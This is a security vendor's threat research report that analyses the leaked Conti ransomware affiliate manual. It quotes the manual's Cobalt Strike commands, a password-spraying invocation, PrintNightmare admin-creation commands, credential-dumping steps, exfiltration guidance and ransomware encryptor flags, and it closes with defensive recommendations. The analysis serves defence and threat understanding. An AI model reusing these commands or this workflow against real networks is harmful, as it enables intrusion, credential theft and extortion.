The Affiliate’s Cookbook - A Firsthand Peek into the Operations and Tradecraft of Conti

FortiGuard Labs Threat Research Report

Ransomware has dominated the media headlines for the first half of 2021. The attack on Colonial Pipeline (Darkside) caused a disruption in the distribution of oil and gasoline across the East coast on the United States (ironically, it was the billing system taken offline and not OT devices controlling the supply). The one on JBS Foods in Brazil (REvil) led to concerns about a potential global meat shortage. And the one that targeted managed service provider Kaseya VSA (REvil) was a supply chain attack which resulted in downstream customers being impacted with ransomware attacks.

Prior to these attacks, the tactics, techniques, and procedures (TTPs) of threat actors were discovered either by forensic analysis conducted by incident response teams or via static analysis of the malware itself. However, a disgruntled self-proclaimed “pentester” of the Conti group recently leaked various insider files to the public. Contained within this leak are zipped password protected files, operational how to documents, and other reference files created by the group for affiliates. Because of this leak, we have been given a sneak peek into the operations of a Ransomware operation from the affiliate perspective.

The Conti ransomware group, in operation for over a year, operates a Ransomware-as-a-Service (RaaS) that has been connected to multiple attacks, including a recent high-profile attack on the Irish Health Service that caused a massive disruption to services. In that attack, not only were services disrupted and brought to a halt, but database servers (SQL) and over 700GB of PII was downloaded and exfiltrated by the threat actors. So, their modus operandi is not just ransom, but extortion by providing proof that valuable data has been exfiltrated.

The primary focus of the following analysis will be on the Conti support manual, titled “CobaltStrike Manuals_V2 Active Directory.” It will touch on several interesting observations lifted from the manual. Although other files and documents were released, this support manual contains information for “affiliates” and offers a rare glimpse into the Ransomware-as-a-Service world.

In this blog, the reader will be presented with the following: 

• A sneak peek into documentation provided to criminal affiliates and the type of support provided by a ransomware organization.
• Observations of recent vulnerabilities, suggesting this document is rather new.
• A perspective into operational strategies, including the TTPs used by the Conti ransomware group, such as tools, methodologies, and an attack overview from its beginning stages to the final ransomware deployment stage.

Nearly a decade of ransomware 

Ransomware in its current form (lock screen, payment in cryptocurrency, etc.) has been around for almost a decade, and yet still makes media headlines. From the first mass ransomware attacks that displayed various law enforcement logos to the victim (based on what locale the victim was in) demanding payment in prepaid credit cards (Reventon – 2012), to the first payments made in Bitcoin cryptocurrency (Cryptolocker -2013), and now, Ransomware-as-a-Service (GandCrab - 2018), it has become almost commonplace. So, how is it that it is still making headlines? 

It is because attacks are becoming more brazen, and victims and the impact of an attack are increasingly high profile. In addition to the ongoing efforts of targeting random indiscriminate individuals and their machines, criminals are increasingly targeting major organizations and their entire environment, thereby causing noticeable disruptions. It is also worth mentioning that their tradecraft has improved, from the basic social engineering techniques via spearphishing or pirated software still used by low-level criminals, to new advanced strategies where, by the time a ransomware attack is launched, the threat actor has already been inside the victim’s network, undiscovered and undetected, sometimes for months before striking. 

Another compounding factor is the new RaaS model. This maturing strategy allows vetted “affiliates” to conduct attacks, rather than the organization that developed the malware. Using a sort of franchise model, affiliates earn a hefty sum of the ransom while paying the ransomware authors a percentage of their gains. For the developers, the money comes through scalability, giving them time to refine their service rather than hunting for victims. This also means that the rate and volume of attacks necessarily increases as the number of affiliates grows. Reports by researchers estimate that ransomware attacks alone in 2020 grew over 150 percent and have netted attackers over 350 million dollars.^1,2

_{^[1] Group-IB: ransomware empire prospers in pandemic-hit world. Attacks grow by 150% https://www.group-ib.com/media/ransomware-empire-2021/}

_{^[2] Ransomware Skyrocketed in 2020, But There May Be Fewer Culprits Than You Think https://blog.chainalysis.com/reports/ransomware-ecosystem-crypto-crime-2021}

Of course, forensic analysis shows that attackers had already successfully embedded themselves inside a network, sometimes for weeks or months at a time, to prepare for executing their attack (interestingly, in a new development, CVE-2020-1472 – Zerologon changed that to hours)³. However, we didn’t have much insight into the operational tradecraft used by affiliates. We just assumed that they were well-versed in pentesting methodologies and skilled in performing their operations. And while we had heard of some ransomware gangs providing advanced attack support for their affiliates, we didn’t really know how much support was provided until now.

The Affiliates’ Cookbook

^[3] _{https://threatpost.com/ryuk-ransomware-gang-zerologon-lightning-attack/160286/}

A cursory analysis of the manual, shown above, highlights the well documented operational procedures of the Conti ransomware group. Titled CobaltStrike Manuals_V2 Active Directory, the document provides insight into the usage (misuse) of Cobalt Strike, a legitimate post exploitation tool used by red teams, along with other how-to guidance and advice from the gang. 

In figure 1, we see (highlighted in green) a suggestion to affiliates to seek out targets and companies with verifiable income by using publicly available data, such as Owler, Manta, Zoominfo, DNB, RocketReach, etc. It also provides working search engine queries to determine company revenue, e.g., "site:XYZ.com revenue" for further specifics. This information is commonly used to gauge the financial resources of lesser well-known entities, as well as to determine how much an organization is willing to pay.

It also provides operational data for the affiliate once they have established a reverse shell or persistence with the victim's Windows Domain Controller. It contains instructions on how to list all domain controllers, local and domain administrators, enterprise administrators, and known domain computers inside a network, as well as how to ping all hosts. Once this traversal information has been established, it provides instructions on how to deploy the payload via PowerShell. 

The text above (figure 2) states that once the various containers are accessed, affiliates should be looking for:

• Accounting
• Clients
• Financial documents 
• IT
• Projects

Other advice includes the usage of multiple pentesting tools (post exploitation), along with the use of a variety of open source tools designed to intercept and brute force passwords at the domain controller. In the following section we look at a number of open source tools identified as the tools of choice of Conti pulled from the machine-translated of the version document.

Kerberoast 

Kerberoasting is a term describing an attack on domain controllers that tries to crack the hash of a Kerberos encrypted password via brute force. Once the hash is cracked, the password is then in clear text, enabling an adversary to traverse deeper into an environment and to add accounts by leveraging compromised higher-level admin accounts. Another suggested tool for affiliates conducting Kerberoast activities is Invoke-Kerberoast.ps1, which is an open source PowerShell script found on Github and maintained by @harmj0y. It is loaded into the Cobalt Strike beacon using the powershell-import command.

The document also defines the ultimate goal as getting the admin password via further brute forcing.

MimiKatz

The manual provides a simple overview of Mimikatz and useful command lines for the extraction of clear passwords from memory, Kerberos tickets, etc. It also highlights examples of combined MimiKatz/Cobalt Strike usage. 

Other instructions include guidance on pass-the-hash/NTLM, reading lsass, procdump, and other post exploitation techniques. It is also interesting to see, in screenshot below, a discussion on exploiting the Zerologon (CVE-2020-1472) vulnerability, which suggests how recent this document is.

SMBAutoBrute

The manual also provides guidance of using the open source tool SMBAutoBrute. According to the Github page for this tool, it allows pentesters to perform smart brute forcing of accounts against the current domain, ensuring that lockouts do not occur. On a side note, researchers at Sentinel One highlighted the usage of SMBAutoBrute within Cobalt Strike in their June 2020 analysis of Trickbot and Ryuk threat actors.⁴

Along with instructions, the authors provide additional guidance, as shown in figure 4, which has been machine-translated from the Russian:

If these passwords less than we can run in a brute force attack - supplement safely them from the following list of the most private occurring in the corporate environment.

Password1

Hello123

password

Welcome1

banco @ 1

training

Password123

job12345

spring

food1234

 It is also recommended to use a list of passwords based on the times of the year and the current year. Given that passwords are changed once in three months - you can take a "reserve" for the generation of the sheet.

_{^[4] Inside a TrickBot Cobalt Strike Attack Serverhttps://labs.sentinelone.com/inside-a-trickbot-cobaltstrike-attack-server/}

For example, in August 2020, we create a list with the following content: 

June2020

July2020

August20

August2020

Summer20

Summer2020

June2020!

July2020!

August20!

August2020!

Summer20!

Summer2020! 

All passwords above fall either into 3 out of 4 requirements for Active Directory passwords (which is enough for users to set them ), or into all 4 requirements.

Approx. we consider the most popular version of the requirements.

Figure 4. Example of Suggestions Provided by Threat Actors, especially based on time of year, etc

 The example below highlights the successful discovery of Admin and CiscoDirSvcs accounts using 1qazXDR% as the password. Note that this is a common password because, if you look at your keyboard, it makes a V pattern:

6. We look at the progress of the script and see the result

Success! Username: Administrator. Password: 1qazXDR% +

Success! Username: CiscoDirSvcs. Password: 1qazXDR% +

We got two domain administrators out of the way.

The scenario without specifying a list of users differs in only two ways.

psinject 4728 x86 Invoke-SMBAutoBrute -PasswordList "Password1, Welcome1, 1qazXDR% +" -LockoutThreshold 5

Figure 4b.Examples of password suggestions provided by threat actors based on time of year, etc

The example above highlights the gang’s efforts to provide useful insight to their affiliates based on what we assume is from their own experiences as they appear to have pentesters on their staff or, at least, individuals knowledgeable of pentesting techniques.

The example below highlights the domain controller information for a successful construction company who may have likely already been a victim of the gang. The document further explains to the reader to look for the parameter of:

Lockout threshold: Never                                                   

Setting the lockout threshold to “Never” means that the account will not be locked after a set number of failed attempts occurs:

Scenario with domain administrators

                      We collect the list of domain administrators with the command

shell net group "domain admins" / dom

We write the received data to the admins.txt file

2 . Fill the file on the host in the folder C: \ ProgramData

3 . Requesting information on the domain account blocking policy (protection against brute force)

beacon> shell net accounts / dom

Tasked beacon to run: net accounts / dom

host called home, sent: 48 bytes

received output:

The request will be processed at a domain controller for domain

 [redacted]construction.com.

Force user logoff how long after time expires ?: Never       

  Minimum password age (days): 1                                

   Maximum password age (days): 42                               

  Minimum password length: 6                                     

Length of password history maintained: 24                

  Lockout threshold: Never                                                    

  Lockout duration (minutes): 30                                    

  Lockout observation window (minutes): 30                 

  Computer role: BACKUP           

Figure 5. More Context into the Forced User Logoff Module

Leveraging Recent Vulnerabilities 

Zerologon and #PrintNightMare

The references to CVE-2020-1472 (privilege escalation in Netlogon)—also known as Zerologon and #PrintNIghtMare, and referenced as CVE-2021-1675 & CVE-2021-34527—reveals to us how recent this document is. It shows that it was either recently created or updated. For reference, CVE-2020-1472 allows an unauthenticated attacker with network access to compromise a domain controller’s Active Directory identity services.

The excerpt below highlights the exploitation of these two recent vulnerabilities, related to July’s 2021 Microsoft Windows Print Spooler vulnerabilities. Essentially, these vulnerabilities allow a normal user account to fully take over and control a client or server machine running an affected print spooler service. Although similar in scope, 1675 is local while 34527 is remotely exploitable. The excerpt below highlights the use of a PowerShell script obtained from Github that is loaded into Cobalt Strike. The Github URL is also provided by the threat actors:

7. PrintNightmare

The vulnerability is fresh, but already sensational. We use it until we shut it down) CVE -2021-34527 Allows you to create a local administrator, useful if an agent arrived with the rights of a simple user

On the agent:

powershell- import // import the file CVE-2021-34527.ps1

powershell Invoke-Nightmare -NewUser "HACKER" -NewPassword "FUCKER" -DriverName "Xeroxxx" // create user HACKER with passord FUCKER, add to localadmins

 spawnas COMPNAME \ HACKER FUCKER https // instead of https the listener name The agent arrives from under our new local administrator There is also a chance to get the agent from under SYSTEM * , we do the following after import:

Invoke-Nightmare -DLL "\ polniy \ put \ do \ payload.dll"

Figure 6. Leveraging #PrintNightMare via PowerShell Import in Cobalt Strike

Leveraging MS17-010 (EternalBlue)

Contained within the document are references to EternalBlue (which covers CVEs CVE-2017-143 to 148). EternalBlue was the Windows SMB server exploit that was initially a Microsoft Windows zero day stockpiled by the NSA. This zero day was ultimately disclosed as part of the ShadowBrokers breach of the NSA in 2017. This disclosure by the Shadow Brokers (a clandestine group unofficially linked to Russia) led to the notorious WannaCry, Petya, and NotPetya attacks that leveraged and exploited this vulnerability. 

Note that this section appears to have been written a long time ago, well before the Conti gang surfaced, as there are references to Windows OS that have not been patched, even though they were patched and addressed by Microsoft in May of 2017. This likely indicates that this section might be either a copy and paste job lifted from another source, or perhaps repurposed by the gang from a document created under a previous guise and simply not updated:

8 . ms17_010

Windows XP and 2003 - do not have the ms17_010 patch

Windows 7 , 8 , 10 , 2008 , 2012 , 2016 - can be not patched and correspondingly vulnerable. During the time the attack on them, to increase chances on a successful operation specify login and password user domain.

Removed AD, pinganulized ip addresses.

ip addresses must be written in one line separated by spaces.

1 . Launching a proxy in Cobalt Strike:

In the Cobalt Strike console, enter the command:

Figure 7. References to EternalBlue which appear to be outdated

Suggested Agents to Deploy

The above excerpt highlights the usage of Mimikatz within a Cobalt Strike beacon to dump hashed domain controller passwords via NTDS.dlt (which contains the AD datafile and passwords). Once this is performed, the reader is instructed to install Anydesk on all abandoned hosts, and Atera on the rest, as seen below:

Further instructions are provided to the affiliate to utilize the following flag for deployment: 

--start-with-win – silent

According to the AnyDesk website,

The flag ­–start-with-win is to start AnyDesk with Windows, which is necessary for remote restart, etc. 

The flag –silent is to not start AnyDesk after installation and do not display error message boxes.

Getting Closer to the End

Looking for network-attached storage and other backup devices and finding them a new home

The guide also provides affiliates with suggestions for using Netscan, which makes finding backup directories and network attached storage devices (NAS) easier. This is done to improve the chances of payment, as well as locating more data to exfiltrate. The manual also suggests that the reader view disks by size, as that is where the “juice” is hidden. Also documented is RouterScan, another open source pentesting tool that allows someone to find devices located on a network, such as a router, web camera, NAS, and any other device that has a web interface that can be brute forced.

Getting ready for exfiltration

To house and store exfiltrated data, the document suggests creating a MEGA.io account. Before this account is created, it also suggests paying in cryptocurrency and choosing the 2 TB plan:

Preparing for Exfiltration, Determining Insurance Levels, and Finally, the Lock Process

Once the MEGA account has been created, it suggests that the affiliate begin looking for items of interest, including bank statements for 2021, account reports, various security documents (assuming red/blue team information), and whether the organization has a cybersecurity insurance policy! Again, according to the authors, anything “juicy.” Affiliates who have exfiltrated this data must be sure to prepare the “datapack” right away, back up to MEGA, and the list all the documents (perhaps as a proof of exfiltration). Automated mass exfiltration is made even easier using the tool RClone. 

Exfiltrating the data has several advantages, such as providing proof of knowledge of what is going on within the victim’s organization and then using that information as leverage in different types of negotiations.

Preparing the datapack

We go to the mega from the torus . and search by keywords. need accounting reports. bank statements. for 20-21 years. all fresh .

especially important cyber insurance, security policy documents .

Search keywords :

cyber

policy

insurance

endorsement

supplementary

underwriting

terms

bank

2020

2021

Statement

and everything that can be juicy.

always who is downloading information

prepares datapack right away

immediately backs up info to mega

and makes a complete listing of all information!

Figure 12. Setting up the datapack and things to look for

The excerpt below highlights the beginning of the ransom lock process stage. In this example, we see that the Conti threat actors use a batch file to deploy a file across the domain. The document also provides instructions for Linux, as well as various flags to look for to locate known and unknown drives, how to disable VMware services, including ESXi, deleting shadow copies, and then engaging in mass lock, which likely means encrypting all identified computers on a network.

New LinuxvVersion and targeting VMware?

There are also some instructions that highlight paths for Linux/Unix versions, as well as versions possibly targeting VMWare, though we have not observed any in the wild (coincidentally, it has been reported that REvil has a Linux variant that targets VMWare’s ESXi⁵). Could this be a new or future feature? It also suggests that if the SSH connection to a targeted machine fails, it will continue the encryption process anyway. Usually, when a SSH connection fails within a Linux/Unix environment, a HUP (hangup) signal is sent to terminate the script, but the authors have thought everything through to make sure this doesn’t happen.

Unix version launch parameters

--path

     When using this parameter, the locker will encrypt files in the specified path. A required parameter will not lock anything without it.

^[5] _{Linux Variant of REvil Ransomware Targets VMware’s ESXi, NAS Devices https://threatpost.com/linux-variant-ransomware-vmwares-nas/167511/}

./ encryptor --path / path

--prockiller

     Kills all processes that interfere with the opening of files.

     ./ encryptor --path / path --prockiller

--log

     Includes logging of all actions and errors

     ./ encryptor --path / path --log /root/log.txt

- vmkiller ( Only for esxi )

     Shuts down all virtual machines

- vmlist ( Only for esxi )

     Specifies a file with a list of virtual machines that should not be shut down. One line for each VM.

     ./ encryptor --path / path --vmkiller --vmlist /tmp/list.txt 

--detach

      Detaches the process from the terminal.

So that if the ssh session falls off, the locker will continue to work

Figure 13b. Setting up the lock process (Linux and VMware)

Disabling AV

There is also a section dedicated to defeating built-in AV tools, such as Windows Defender. Tips to defeat another well-known antivirus company are also offered. This is deployed via batch files and scheduled tasks.

Other Items of Interest

Operation Security Guidance (Anonymity for paranoid.txt)

Notes on operational guidance for remaining anonymous are also provided by the Conti Group. They highlight the importance of remaining anonymous, but also discuss that is not imperative to hide, since by disabling known services and technologies the attacker is even more likely to be detected. They even advise not utilizing well-known Linux pentesting operating systems, and suggest either using generic ones or build their own.

Пару замечаний к постам об анонимности для параноиков:

1. Задача не скрыться (всё равно не получится), а слиться с толпой. Так что отключив webrtc, Javascript, Flash и т.д. будите только больше внимания к себе привлекать. Нужно НЕ ОТКЛЮЧАТЬ, а ПОДМЕНЯТЬ то что позволяет вас обнаружить.

2. По поводу Kali и других ОС для хакеров. Вот есть группа людей (Хаккеров), которую нужно отследить. Технически эту задачу решить тяжело. Проще сыграть на человеческой слабости (лень) и собрать всех в кучу предоставив правильно разрекламированное, удобное, готовое и популярное решение. Думаю мысь понятна. Cоветую использовать Debian или собрать что-то свое.

Saint спаибо за материал, добавил NetScan в алгоритм

Figure 14a. Russian transcription on operational awareness

The Affiliate's Cookbook Conclusion

Although the instructions provided in the manual are well documented, some portions of the content appear to be rehashed or likely repurposed from elsewhere, reminiscent of the 2000’s play of the classic 70’s Anarchist Cookbook, The Anarchy Cookbook from Jolly Roger. However, this doesn't mean that the document is poorly written. It is actually quite novel to see the time and effort taken by threat actors engaged in illegal activity to properly document some of their tradecraft, regardless of refinement or plagiarism, thereby allowing others who are less skilled or less experienced to have a fundamental understanding of how to get started. 

Of course, it makes a lot of sense for a ransomware gang to make it easier for their affiliates to use their ransomware, as this is a business and there are competitors out there. Any outfit run like a business will pay attention to things like market share and usage frequency, and will therefore make an effort to increase the likelihood of affiliate adoption to increase market share and profitability.

Fortinet Protections

FortiGuard Labs provides the following AV coverage against known Conti ransomware samples campaign:

W32/Conti.I!tr
W64/Filecoder_Conti.A!tr
W64/Conti.A!tr.ransom
W32/Filecoder_Conti.D!tr
W32/Conti.R!tr.ransom
W32/Conti.HLCT!tr.ransom
W32/Filecoder_Conti.R!tr
W32/Conti.L!tr.ransom
W32/Conti.N!tr.ransom
W64/Conti.M!tr.ransom

All known network IOCs are blocked by the WebFiltering client.

FortiEDR detects and blocks Conti ransomware attacks out of the box without any prior knowledge or special configuration beforehand. This can be seen in the images below, where the TTPs of the attackers are detected pre-execution.

For more information on how FortiEDR blocks Conti, please refer to the following KB article:

As it has been observed that many Conti affiliates use AnyDesk, Atera, Splashtop, Remote Utilities, and Screen Connect to initialize and maintain persistent network access, it is recommended that organizations block all remote access connections from these programs by utilizing application controls if there is no business justification for their use.

Due to the ease of disruption and damage to daily operations and the reputation of an organization, as well as the unwanted release of personally identifiable information (PII), etc., it is important to keep all AV and IPS signatures up to date.

It is also important to ensure that all known vendor vulnerabilities are addressed and updated to prevent attackers from gaining a foothold within a network. Attackers are well-aware of the difficulty of patching, and they exploit that reality. Therefore, if it is determined that patching anywhere in the network is not currently feasible, an assessment should be conducted to determine risk and alternative protections, such as hot patching, should take place.

And finally, organizations are encouraged to conduct ongoing training sessions to educate and inform personnel about the latest phishing/spear phishing attacks. They need to be able to identify attacks, know to never open attachments from someone they don't know, and to always treat emails from unrecognized/untrusted senders with caution. Since many ransomware attacks are also delivered via social engineering, it is crucial that end users be made aware of the various types of attacks being used against them through regular training sessions and impromptu tests using predetermined templates by an organizations' internal security department. Simple user awareness training on how to spot emails with malicious attachments or links could also help prevent initial access into the network.

Learn more about Fortinet’s FortiGuard Labs threat research and intelligence organization and the FortiGuard Security Subscriptions and Services portfolio.

Learn more about Fortinet’s free cybersecurity training, an initiative of Fortinet’s Training Advancement Agenda (TAA), or about the Fortinet Network Security Expert program, Security Academy program, and Veterans program. Learn more about FortiGuard Labs global threat intelligence and research and the FortiGuard Security Subscriptions and Services portfolio.